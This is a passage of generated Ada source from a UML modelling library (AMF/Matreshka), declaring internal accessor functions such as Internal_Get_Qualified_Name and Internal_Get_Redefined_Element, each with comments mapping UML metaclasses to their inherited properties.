Model => Package::profileApplication -- Package => Package::profileApplication -- Profile => Package::profileApplication function Internal_Get_Protected_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Protected_Node (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExceptionHandler => ExceptionHandler::protectedNode function Internal_Get_Protocol (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Protocol (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Interface => Interface::protocol -- Port => Port::protocol function Internal_Get_Provided (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Component => Component::provided -- Port => Port::provided function Internal_Get_Qualified_Name (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; -- Abstraction => NamedElement::qualifiedName -- AcceptCallAction => NamedElement::qualifiedName -- AcceptEventAction => NamedElement::qualifiedName -- ActionExecutionSpecification => NamedElement::qualifiedName -- ActionInputPin => NamedElement::qualifiedName -- Activity => NamedElement::qualifiedName -- ActivityFinalNode => NamedElement::qualifiedName -- ActivityParameterNode => NamedElement::qualifiedName -- ActivityPartition => NamedElement::qualifiedName -- Actor => NamedElement::qualifiedName -- AddStructuralFeatureValueAction => NamedElement::qualifiedName -- AddVariableValueAction => NamedElement::qualifiedName -- AnyReceiveEvent => NamedElement::qualifiedName -- Artifact => NamedElement::qualifiedName -- Association => NamedElement::qualifiedName -- AssociationClass => NamedElement::qualifiedName -- BehaviorExecutionSpecification => NamedElement::qualifiedName -- BroadcastSignalAction => NamedElement::qualifiedName -- CallBehaviorAction => NamedElement::qualifiedName -- CallEvent => NamedElement::qualifiedName -- CallOperationAction => NamedElement::qualifiedName -- CentralBufferNode => NamedElement::qualifiedName -- ChangeEvent => NamedElement::qualifiedName -- Class => NamedElement::qualifiedName -- ClearAssociationAction => NamedElement::qualifiedName -- ClearStructuralFeatureAction => NamedElement::qualifiedName -- ClearVariableAction => NamedElement::qualifiedName -- Collaboration => NamedElement::qualifiedName -- CollaborationUse => NamedElement::qualifiedName -- CombinedFragment => NamedElement::qualifiedName -- CommunicationPath => NamedElement::qualifiedName -- Component => NamedElement::qualifiedName -- ComponentRealization => NamedElement::qualifiedName -- ConditionalNode => NamedElement::qualifiedName -- ConnectionPointReference => NamedElement::qualifiedName -- Connector => NamedElement::qualifiedName -- ConsiderIgnoreFragment => NamedElement::qualifiedName -- Constraint => NamedElement::qualifiedName -- Continuation => NamedElement::qualifiedName -- ControlFlow => NamedElement::qualifiedName -- CreateLinkAction => NamedElement::qualifiedName -- CreateLinkObjectAction => NamedElement::qualifiedName -- CreateObjectAction => NamedElement::qualifiedName -- UMLActivityDiagram => NamedElement::qualifiedName -- UMLClassDiagram => NamedElement::qualifiedName -- UMLComponentDiagram => NamedElement::qualifiedName -- UMLCompositeStructureDiagram => NamedElement::qualifiedName -- UMLDeploymentDiagram => NamedElement::qualifiedName -- UMLInteractionDiagram => NamedElement::qualifiedName -- UMLObjectDiagram => NamedElement::qualifiedName -- UMLPackageDiagram => NamedElement::qualifiedName -- UMLProfileDiagram => NamedElement::qualifiedName -- UMLStateMachineDiagram => NamedElement::qualifiedName -- UMLStyle => NamedElement::qualifiedName -- UMLUseCaseDiagram => NamedElement::qualifiedName -- DataStoreNode => NamedElement::qualifiedName -- DataType => NamedElement::qualifiedName -- DecisionNode => NamedElement::qualifiedName -- Dependency => NamedElement::qualifiedName -- Deployment => NamedElement::qualifiedName -- DeploymentSpecification => NamedElement::qualifiedName -- DestroyLinkAction => NamedElement::qualifiedName -- DestroyObjectAction => NamedElement::qualifiedName -- DestructionOccurrenceSpecification => NamedElement::qualifiedName -- Device => NamedElement::qualifiedName -- Duration => NamedElement::qualifiedName -- DurationConstraint => NamedElement::qualifiedName -- DurationInterval => NamedElement::qualifiedName -- DurationObservation => NamedElement::qualifiedName -- Enumeration => NamedElement::qualifiedName -- EnumerationLiteral => NamedElement::qualifiedName -- ExecutionEnvironment => NamedElement::qualifiedName -- ExecutionOccurrenceSpecification => NamedElement::qualifiedName -- ExpansionNode => NamedElement::qualifiedName -- ExpansionRegion => NamedElement::qualifiedName -- Expression => NamedElement::qualifiedName -- Extend => NamedElement::qualifiedName -- Extension => NamedElement::qualifiedName -- ExtensionEnd => NamedElement::qualifiedName -- ExtensionPoint => NamedElement::qualifiedName -- FinalState => NamedElement::qualifiedName -- FlowFinalNode => NamedElement::qualifiedName -- ForkNode => NamedElement::qualifiedName -- FunctionBehavior => NamedElement::qualifiedName -- Gate => NamedElement::qualifiedName -- GeneralOrdering => NamedElement::qualifiedName -- GeneralizationSet => NamedElement::qualifiedName -- Include => NamedElement::qualifiedName -- InformationFlow => NamedElement::qualifiedName -- InformationItem => NamedElement::qualifiedName -- InitialNode => NamedElement::qualifiedName -- InputPin => NamedElement::qualifiedName -- InstanceSpecification => NamedElement::qualifiedName -- InstanceValue => NamedElement::qualifiedName -- Interaction => NamedElement::qualifiedName -- InteractionConstraint => NamedElement::qualifiedName -- InteractionOperand => NamedElement::qualifiedName -- InteractionUse => NamedElement::qualifiedName -- Interface => NamedElement::qualifiedName -- InterfaceRealization => NamedElement::qualifiedName -- InterruptibleActivityRegion => NamedElement::qualifiedName -- Interval => NamedElement::qualifiedName -- IntervalConstraint => NamedElement::qualifiedName -- JoinNode => NamedElement::qualifiedName -- Lifeline => NamedElement::qualifiedName -- LiteralBoolean => NamedElement::qualifiedName -- LiteralInteger => NamedElement::qualifiedName -- LiteralNull => NamedElement::qualifiedName -- LiteralReal => NamedElement::qualifiedName -- LiteralString => NamedElement::qualifiedName -- LiteralUnlimitedNatural => NamedElement::qualifiedName -- LoopNode => NamedElement::qualifiedName -- Manifestation => NamedElement::qualifiedName -- MergeNode => NamedElement::qualifiedName -- Message => NamedElement::qualifiedName -- MessageOccurrenceSpecification => NamedElement::qualifiedName -- Model => NamedElement::qualifiedName -- Node => NamedElement::qualifiedName -- ObjectFlow => NamedElement::qualifiedName -- OccurrenceSpecification => NamedElement::qualifiedName -- OpaqueAction => NamedElement::qualifiedName -- OpaqueBehavior => NamedElement::qualifiedName -- OpaqueExpression => NamedElement::qualifiedName -- Operation => NamedElement::qualifiedName -- OutputPin => NamedElement::qualifiedName -- Package => NamedElement::qualifiedName -- Parameter => NamedElement::qualifiedName -- ParameterSet => NamedElement::qualifiedName -- PartDecomposition => NamedElement::qualifiedName -- Port => NamedElement::qualifiedName -- PrimitiveType => NamedElement::qualifiedName -- Profile => NamedElement::qualifiedName -- Property => NamedElement::qualifiedName -- ProtocolStateMachine => NamedElement::qualifiedName -- ProtocolTransition => NamedElement::qualifiedName -- Pseudostate => NamedElement::qualifiedName -- RaiseExceptionAction => NamedElement::qualifiedName -- ReadExtentAction => NamedElement::qualifiedName -- ReadIsClassifiedObjectAction => NamedElement::qualifiedName -- ReadLinkAction => NamedElement::qualifiedName -- ReadLinkObjectEndAction => NamedElement::qualifiedName -- ReadLinkObjectEndQualifierAction => NamedElement::qualifiedName -- ReadSelfAction => NamedElement::qualifiedName -- ReadStructuralFeatureAction => NamedElement::qualifiedName -- ReadVariableAction => NamedElement::qualifiedName -- Realization => NamedElement::qualifiedName -- Reception => NamedElement::qualifiedName -- ReclassifyObjectAction => NamedElement::qualifiedName -- RedefinableTemplateSignature => NamedElement::qualifiedName -- ReduceAction => NamedElement::qualifiedName -- Region => NamedElement::qualifiedName -- RemoveStructuralFeatureValueAction => NamedElement::qualifiedName -- RemoveVariableValueAction => NamedElement::qualifiedName -- ReplyAction => NamedElement::qualifiedName -- SendObjectAction => NamedElement::qualifiedName -- SendSignalAction => NamedElement::qualifiedName -- SequenceNode => NamedElement::qualifiedName -- Signal => NamedElement::qualifiedName -- SignalEvent => NamedElement::qualifiedName -- StartClassifierBehaviorAction => NamedElement::qualifiedName -- StartObjectBehaviorAction => NamedElement::qualifiedName -- State => NamedElement::qualifiedName -- StateInvariant => NamedElement::qualifiedName -- StateMachine => NamedElement::qualifiedName -- Stereotype => NamedElement::qualifiedName -- StringExpression => NamedElement::qualifiedName -- StructuredActivityNode => NamedElement::qualifiedName -- Substitution => NamedElement::qualifiedName -- TestIdentityAction => NamedElement::qualifiedName -- TimeConstraint => NamedElement::qualifiedName -- TimeEvent => NamedElement::qualifiedName -- TimeExpression => NamedElement::qualifiedName -- TimeInterval => NamedElement::qualifiedName -- TimeObservation => NamedElement::qualifiedName -- Transition => NamedElement::qualifiedName -- Trigger => NamedElement::qualifiedName -- UnmarshallAction => NamedElement::qualifiedName -- Usage => NamedElement::qualifiedName -- UseCase => NamedElement::qualifiedName -- ValuePin => NamedElement::qualifiedName -- ValueSpecificationAction => NamedElement::qualifiedName -- Variable => NamedElement::qualifiedName function Internal_Get_Qualifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ExtensionEnd => Property::qualifier -- LinkEndCreationData => LinkEndData::qualifier -- LinkEndData => LinkEndData::qualifier -- LinkEndDestructionData => LinkEndData::qualifier -- Port => Property::qualifier -- Property => Property::qualifier function Internal_Get_Qualifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Qualifier (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- QualifierValue => QualifierValue::qualifier -- ReadLinkObjectEndQualifierAction => ReadLinkObjectEndQualifierAction::qualifier function Internal_Get_Raised_Exception (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Operation => BehavioralFeature::raisedException -- Reception => BehavioralFeature::raisedException function Internal_Get_Realization (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Component => Component::realization -- InformationFlow => InformationFlow::realization function Internal_Get_Realizing_Activity_Edge (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InformationFlow => InformationFlow::realizingActivityEdge function Internal_Get_Realizing_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ComponentRealization => ComponentRealization::realizingClassifier function Internal_Get_Realizing_Connector (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InformationFlow => InformationFlow::realizingConnector function Internal_Get_Realizing_Message (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InformationFlow => InformationFlow::realizingMessage function Internal_Get_Receive_Event (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Receive_Event (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Message => Message::receiveEvent function Internal_Get_Receiving_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Receiving_Package (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- PackageMerge => PackageMerge::receivingPackage function Internal_Get_Redefined_Behavior (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Behavior::redefinedBehavior -- FunctionBehavior => Behavior::redefinedBehavior -- Interaction => Behavior::redefinedBehavior -- OpaqueBehavior => Behavior::redefinedBehavior -- ProtocolStateMachine => Behavior::redefinedBehavior -- StateMachine => Behavior::redefinedBehavior function Internal_Get_Redefined_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::redefinedClassifier -- Actor => Classifier::redefinedClassifier -- Artifact => Classifier::redefinedClassifier -- Association => Classifier::redefinedClassifier -- AssociationClass => Classifier::redefinedClassifier -- Class => Classifier::redefinedClassifier -- Collaboration => Classifier::redefinedClassifier -- CommunicationPath => Classifier::redefinedClassifier -- Component => Classifier::redefinedClassifier -- DataType => Classifier::redefinedClassifier -- DeploymentSpecification => Classifier::redefinedClassifier -- Device => Classifier::redefinedClassifier -- Enumeration => Classifier::redefinedClassifier -- ExecutionEnvironment => Classifier::redefinedClassifier -- Extension => Classifier::redefinedClassifier -- FunctionBehavior => Classifier::redefinedClassifier -- InformationItem => Classifier::redefinedClassifier -- Interaction => Classifier::redefinedClassifier -- Interface => Classifier::redefinedClassifier -- Node => Classifier::redefinedClassifier -- OpaqueBehavior => Classifier::redefinedClassifier -- PrimitiveType => Classifier::redefinedClassifier -- ProtocolStateMachine => Classifier::redefinedClassifier -- Signal => Classifier::redefinedClassifier -- StateMachine => Classifier::redefinedClassifier -- Stereotype => Classifier::redefinedClassifier -- UseCase => Classifier::redefinedClassifier function Internal_Get_Redefined_Connector (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Connector => Connector::redefinedConnector function Internal_Get_Redefined_Edge (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ControlFlow => ActivityEdge::redefinedEdge -- ObjectFlow => ActivityEdge::redefinedEdge function Internal_Get_Redefined_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => RedefinableElement::redefinedElement -- AcceptEventAction => RedefinableElement::redefinedElement -- ActionInputPin => RedefinableElement::redefinedElement -- Activity => RedefinableElement::redefinedElement -- ActivityFinalNode => RedefinableElement::redefinedElement -- ActivityParameterNode => RedefinableElement::redefinedElement -- Actor => RedefinableElement::redefinedElement -- AddStructuralFeatureValueAction => RedefinableElement::redefinedElement -- AddVariableValueAction => RedefinableElement::redefinedElement -- Artifact => RedefinableElement::redefinedElement -- Association => RedefinableElement::redefinedElement -- AssociationClass => RedefinableElement::redefinedElement -- BroadcastSignalAction => RedefinableElement::redefinedElement -- CallBehaviorAction => RedefinableElement::redefinedElement -- CallOperationAction => RedefinableElement::redefinedElement -- CentralBufferNode => RedefinableElement::redefinedElement -- Class => RedefinableElement::redefinedElement -- ClearAssociationAction => RedefinableElement::redefinedElement -- ClearStructuralFeatureAction => RedefinableElement::redefinedElement -- ClearVariableAction => RedefinableElement::redefinedElement -- Collaboration => RedefinableElement::redefinedElement -- CommunicationPath => RedefinableElement::redefinedElement -- Component => RedefinableElement::redefinedElement -- ConditionalNode => RedefinableElement::redefinedElement -- Connector => RedefinableElement::redefinedElement -- ControlFlow => RedefinableElement::redefinedElement -- CreateLinkAction => RedefinableElement::redefinedElement -- CreateLinkObjectAction => RedefinableElement::redefinedElement -- CreateObjectAction => RedefinableElement::redefinedElement -- DataStoreNode => RedefinableElement::redefinedElement -- DataType => RedefinableElement::redefinedElement -- DecisionNode => RedefinableElement::redefinedElement -- DeploymentSpecification => RedefinableElement::redefinedElement -- DestroyLinkAction => RedefinableElement::redefinedElement -- DestroyObjectAction => RedefinableElement::redefinedElement -- Device => RedefinableElement::redefinedElement -- Enumeration => RedefinableElement::redefinedElement -- ExecutionEnvironment => RedefinableElement::redefinedElement -- ExpansionNode => RedefinableElement::redefinedElement -- ExpansionRegion => RedefinableElement::redefinedElement -- Extension => RedefinableElement::redefinedElement -- ExtensionEnd => RedefinableElement::redefinedElement -- ExtensionPoint => RedefinableElement::redefinedElement -- FinalState => RedefinableElement::redefinedElement -- FlowFinalNode => RedefinableElement::redefinedElement -- ForkNode => RedefinableElement::redefinedElement -- FunctionBehavior => RedefinableElement::redefinedElement -- InformationItem => RedefinableElement::redefinedElement -- InitialNode => RedefinableElement::redefinedElement -- InputPin => RedefinableElement::redefinedElement -- Interaction => RedefinableElement::redefinedElement -- Interface => RedefinableElement::redefinedElement -- JoinNode => RedefinableElement::redefinedElement -- LoopNode => RedefinableElement::redefinedElement -- MergeNode => RedefinableElement::redefinedElement -- Node => RedefinableElement::redefinedElement -- ObjectFlow => RedefinableElement::redefinedElement -- OpaqueAction => RedefinableElement::redefinedElement -- OpaqueBehavior => RedefinableElement::redefinedElement -- Operation => RedefinableElement::redefinedElement -- OutputPin => RedefinableElement::redefinedElement -- Port => RedefinableElement::redefinedElement -- PrimitiveType => RedefinableElement::redefinedElement -- Property => RedefinableElement::redefinedElement -- ProtocolStateMachine => RedefinableElement::redefinedElement -- ProtocolTransition => RedefinableElement::redefinedElement -- RaiseExceptionAction => RedefinableElement::redefinedElement -- ReadExtentAction => RedefinableElement::redefinedElement -- ReadIsClassifiedObjectAction => RedefinableElement::redefinedElement -- ReadLinkAction => RedefinableElement::redefinedElement -- ReadLinkObjectEndAction => RedefinableElement::redefinedElement -- ReadLinkObjectEndQualifierAction => RedefinableElement::redefinedElement -- ReadSelfAction => RedefinableElement::redefinedElement -- ReadStructuralFeatureAction => RedefinableElement::redefinedElement -- ReadVariableAction => RedefinableElement::redefinedElement -- Reception => RedefinableElement::redefinedElement -- ReclassifyObjectAction => RedefinableElement::redefinedElement -- RedefinableTemplateSignature => RedefinableElement::redefinedElement -- ReduceAction => RedefinableElement::redefinedElement -- Region => RedefinableElement::redefinedElement -- RemoveStructuralFeatureValueAction => RedefinableElement::redefinedElement -- RemoveVariableValueAction => RedefinableElement::redefinedElement -- ReplyAction => RedefinableElement::redefinedElement -- SendObjectAction => RedefinableElement::redefinedElement -- SendSignalAction => RedefinableElement::redefinedElement -- SequenceNode => RedefinableElement::redefinedElement -- Signal => RedefinableElement::redefinedElement -- StartClassifierBehaviorAction => RedefinableElement::redefinedElement -- StartObjectBehaviorAction => RedefinableElement::redefinedElement -- State => RedefinableElement::redefinedElement -- StateMachine => RedefinableElement::redefinedElement -- Stereotype => RedefinableElement::redefinedElement -- StructuredActivityNode => RedefinableElement::redefinedElement -- TestIdentityAction => RedefinableElement::redefinedElement -- Transition => RedefinableElement::redefinedElement -- UnmarshallAction => RedefinableElement::redefinedElement -- UseCase => RedefinableElement::redefinedElement -- ValuePin => RedefinableElement::redefinedElement -- ValueSpecificationAction => RedefinableElement::redefinedElement function Internal_Get_Redefined_Interface (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Interface => Interface::redefinedInterface function Internal_Get_Redefined_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => ActivityNode::redefinedNode -- AcceptEventAction => ActivityNode::redefinedNode -- ActionInputPin => ActivityNode::redefinedNode -- ActivityFinalNode => ActivityNode::redefinedNode -- ActivityParameterNode => ActivityNode::redefinedNode -- AddStructuralFeatureValueAction => ActivityNode::redefinedNode -- AddVariableValueAction => ActivityNode::redefinedNode -- BroadcastSignalAction => ActivityNode::redefinedNode -- CallBehaviorAction => ActivityNode::redefinedNode -- CallOperationAction => ActivityNode::redefinedNode -- CentralBufferNode => ActivityNode::redefinedNode -- ClearAssociationAction => ActivityNode::redefinedNode -- ClearStructuralFeatureAction => ActivityNode::redefinedNode -- ClearVariableAction => ActivityNode::redefinedNode -- ConditionalNode => ActivityNode::redefinedNode -- CreateLinkAction => ActivityNode::redefinedNode -- CreateLinkObjectAction => ActivityNode::redefinedNode -- CreateObjectAction => ActivityNode::redefinedNode -- DataStoreNode => ActivityNode::redefinedNode -- DecisionNode => ActivityNode::redefinedNode -- DestroyLinkAction => ActivityNode::redefinedNode -- DestroyObjectAction => ActivityNode::redefinedNode -- ExpansionNode => ActivityNode::redefinedNode -- ExpansionRegion => ActivityNode::redefinedNode -- FlowFinalNode => ActivityNode::redefinedNode -- ForkNode => ActivityNode::redefinedNode -- InitialNode => ActivityNode::redefinedNode -- InputPin => ActivityNode::redefinedNode -- JoinNode => ActivityNode::redefinedNode -- LoopNode => ActivityNode::redefinedNode -- MergeNode => ActivityNode::redefinedNode -- OpaqueAction => ActivityNode::redefinedNode -- OutputPin => ActivityNode::redefinedNode -- RaiseExceptionAction => ActivityNode::redefinedNode -- ReadExtentAction => ActivityNode::redefinedNode -- ReadIsClassifiedObjectAction => ActivityNode::redefinedNode -- ReadLinkAction => ActivityNode::redefinedNode -- ReadLinkObjectEndAction => ActivityNode::redefinedNode -- ReadLinkObjectEndQualifierAction => ActivityNode::redefinedNode -- ReadSelfAction => ActivityNode::redefinedNode -- ReadStructuralFeatureAction => ActivityNode::redefinedNode -- ReadVariableAction => ActivityNode::redefinedNode -- ReclassifyObjectAction => ActivityNode::redefinedNode -- ReduceAction => ActivityNode::redefinedNode -- RemoveStructuralFeatureValueAction => ActivityNode::redefinedNode -- RemoveVariableValueAction => ActivityNode::redefinedNode -- ReplyAction => ActivityNode::redefinedNode -- SendObjectAction => ActivityNode::redefinedNode -- SendSignalAction => ActivityNode::redefinedNode -- SequenceNode => ActivityNode::redefinedNode -- StartClassifierBehaviorAction => ActivityNode::redefinedNode -- StartObjectBehaviorAction => ActivityNode::redefinedNode -- StructuredActivityNode => ActivityNode::redefinedNode -- TestIdentityAction => ActivityNode::redefinedNode -- UnmarshallAction => ActivityNode::redefinedNode -- ValuePin => ActivityNode::redefinedNode -- ValueSpecificationAction => ActivityNode::redefinedNode function Internal_Get_Redefined_Operation (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Operation => Operation::redefinedOperation function Internal_Get_Redefined_Port (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Port => Port::redefinedPort function Internal_Get_Redefined_Property (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ExtensionEnd => Property::redefinedProperty -- Port => Property::redefinedProperty -- Property => Property::redefinedProperty function Internal_Get_Redefined_State (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Redefined_State (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- FinalState => State::redefinedState -- State => State::redefinedState function Internal_Get_Redefined_Transition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Redefined_Transition (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProtocolTransition => Transition::redefinedTransition -- Transition => Transition::redefinedTransition function Internal_Get_Redefinition_Context (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => RedefinableElement::redefinitionContext -- AcceptEventAction => RedefinableElement::redefinitionContext -- ActionInputPin => RedefinableElement::redefinitionContext -- Activity => RedefinableElement::redefinitionContext -- ActivityFinalNode => RedefinableElement::redefinitionContext -- ActivityParameterNode => RedefinableElement::redefinitionContext -- Actor => RedefinableElement::redefinitionContext -- AddStructuralFeatureValueAction => RedefinableElement::redefinitionContext -- AddVariableValueAction => RedefinableElement::redefinitionContext -- Artifact => RedefinableElement::redefinitionContext -- Association => RedefinableElement::redefinitionContext -- AssociationClass => RedefinableElement::redefinitionContext -- BroadcastSignalAction => RedefinableElement::redefinitionContext -- CallBehaviorAction => RedefinableElement::redefinitionContext -- CallOperationAction => RedefinableElement::redefinitionContext -- CentralBufferNode => RedefinableElement::redefinitionContext -- Class => RedefinableElement::redefinitionContext -- ClearAssociationAction => RedefinableElement::redefinitionContext -- ClearStructuralFeatureAction => RedefinableElement::redefinitionContext -- ClearVariableAction => RedefinableElement::redefinitionContext -- Collaboration => RedefinableElement::redefinitionContext -- CommunicationPath => RedefinableElement::redefinitionContext -- Component => RedefinableElement::redefinitionContext -- ConditionalNode => RedefinableElement::redefinitionContext -- Connector => RedefinableElement::redefinitionContext -- ControlFlow => RedefinableElement::redefinitionContext -- CreateLinkAction => RedefinableElement::redefinitionContext -- CreateLinkObjectAction => RedefinableElement::redefinitionContext -- CreateObjectAction => RedefinableElement::redefinitionContext -- DataStoreNode => RedefinableElement::redefinitionContext -- DataType => RedefinableElement::redefinitionContext -- DecisionNode => RedefinableElement::redefinitionContext -- DeploymentSpecification => RedefinableElement::redefinitionContext -- DestroyLinkAction => RedefinableElement::redefinitionContext -- DestroyObjectAction => RedefinableElement::redefinitionContext -- Device => RedefinableElement::redefinitionContext -- Enumeration => RedefinableElement::redefinitionContext -- ExecutionEnvironment => RedefinableElement::redefinitionContext -- ExpansionNode => RedefinableElement::redefinitionContext -- ExpansionRegion => RedefinableElement::redefinitionContext -- Extension => RedefinableElement::redefinitionContext -- ExtensionEnd => RedefinableElement::redefinitionContext -- ExtensionPoint => RedefinableElement::redefinitionContext -- FinalState => RedefinableElement::redefinitionContext -- FlowFinalNode => RedefinableElement::redefinitionContext -- ForkNode => RedefinableElement::redefinitionContext -- FunctionBehavior => RedefinableElement::redefinitionContext -- InformationItem => RedefinableElement::redefinitionContext -- InitialNode => RedefinableElement::redefinitionContext -- InputPin => RedefinableElement::redefinitionContext -- Interaction => RedefinableElement::redefinitionContext -- Interface => RedefinableElement::redefinitionContext -- JoinNode => RedefinableElement::redefinitionContext -- LoopNode => RedefinableElement::redefinitionContext -- MergeNode => RedefinableElement::redefinitionContext -- Node => RedefinableElement::redefinitionContext -- ObjectFlow => RedefinableElement::redefinitionContext -- OpaqueAction => RedefinableElement::redefinitionContext -- OpaqueBehavior => RedefinableElement::redefinitionContext -- Operation => RedefinableElement::redefinitionContext -- OutputPin => RedefinableElement::redefinitionContext -- Port => RedefinableElement::redefinitionContext -- PrimitiveType => RedefinableElement::redefinitionContext -- Property => RedefinableElement::redefinitionContext -- ProtocolStateMachine => RedefinableElement::redefinitionContext -- ProtocolTransition => RedefinableElement::redefinitionContext -- RaiseExceptionAction => RedefinableElement::redefinitionContext -- ReadExtentAction => RedefinableElement::redefinitionContext -- ReadIsClassifiedObjectAction => RedefinableElement::redefinitionContext -- ReadLinkAction => RedefinableElement::redefinitionContext -- ReadLinkObjectEndAction => RedefinableElement::redefinitionContext -- ReadLinkObjectEndQualifierAction => RedefinableElement::redefinitionContext -- ReadSelfAction => RedefinableElement::redefinitionContext -- ReadStructuralFeatureAction => RedefinableElement::redefinitionContext -- ReadVariableAction => RedefinableElement::redefinitionContext -- Reception => RedefinableElement::redefinitionContext -- ReclassifyObjectAction => RedefinableElement::redefinitionContext -- RedefinableTemplateSignature => RedefinableElement::redefinitionContext -- ReduceAction => RedefinableElement::redefinitionContext -- Region => RedefinableElement::redefinitionContext -- RemoveStructuralFeatureValueAction => RedefinableElement::redefinitionContext -- RemoveVariableValueAction => RedefinableElement::redefinitionContext -- ReplyAction => RedefinableElement::redefinitionContext -- SendObjectAction => RedefinableElement::redefinitionContext -- SendSignalAction => RedefinableElement::redefinitionContext -- SequenceNode => RedefinableElement::redefinitionContext -- Signal => RedefinableElement::redefinitionContext -- StartClassifierBehaviorAction => RedefinableElement::redefinitionContext -- StartObjectBehaviorAction => RedefinableElement::redefinitionContext -- State => RedefinableElement::redefinitionContext -- StateMachine => RedefinableElement::redefinitionContext -- Stereotype => RedefinableElement::redefinitionContext -- StructuredActivityNode => RedefinableElement::redefinitionContext -- TestIdentityAction => RedefinableElement::redefinitionContext -- Transition => RedefinableElement::redefinitionContext -- UnmarshallAction => RedefinableElement::redefinitionContext -- UseCase => RedefinableElement::redefinitionContext -- ValuePin => RedefinableElement::redefinitionContext -- ValueSpecificationAction => RedefinableElement::redefinitionContext function Internal_Get_Redefinition_Context (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; -- FinalState => State::redefinitionContext -- ProtocolTransition => Transition::redefinitionContext -- Region => Region::redefinitionContext -- State => State::redefinitionContext -- Transition => Transition::redefinitionContext function Internal_Get_Reducer (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Reducer (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ReduceAction => ReduceAction::reducer function Internal_Get_Referred (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ProtocolTransition => ProtocolTransition::referred function Internal_Get_Refers_To (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Refers_To (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InteractionUse => InteractionUse::refersTo -- PartDecomposition => InteractionUse::refersTo function Internal_Get_Region (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- FinalState => State::region -- ProtocolStateMachine => StateMachine::region -- State => State::region -- StateMachine => StateMachine::region function Internal_Get_Region_As_Input (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Region_As_Input (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExpansionNode => ExpansionNode::regionAsInput function Internal_Get_Region_As_Output (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Region_As_Output (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExpansionNode => ExpansionNode::regionAsOutput function Internal_Get_Related_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Abstraction => Relationship::relatedElement -- Association => Relationship::relatedElement -- AssociationClass => Relationship::relatedElement -- CommunicationPath => Relationship::relatedElement -- ComponentRealization => Relationship::relatedElement -- Dependency => Relationship::relatedElement -- Deployment => Relationship::relatedElement -- ElementImport => Relationship::relatedElement -- Extend => Relationship::relatedElement -- Extension => Relationship::relatedElement -- Generalization => Relationship::relatedElement -- Include => Relationship::relatedElement -- InformationFlow => Relationship::relatedElement -- InterfaceRealization => Relationship::relatedElement -- Manifestation => Relationship::relatedElement -- PackageImport => Relationship::relatedElement -- PackageMerge => Relationship::relatedElement -- ProfileApplication => Relationship::relatedElement -- ProtocolConformance => Relationship::relatedElement -- Realization => Relationship::relatedElement -- Substitution => Relationship::relatedElement -- TemplateBinding => Relationship::relatedElement -- Usage => Relationship::relatedElement function Internal_Get_Remove_At (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Remove_At (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- RemoveStructuralFeatureValueAction => RemoveStructuralFeatureValueAction::removeAt -- RemoveVariableValueAction => RemoveVariableValueAction::removeAt function 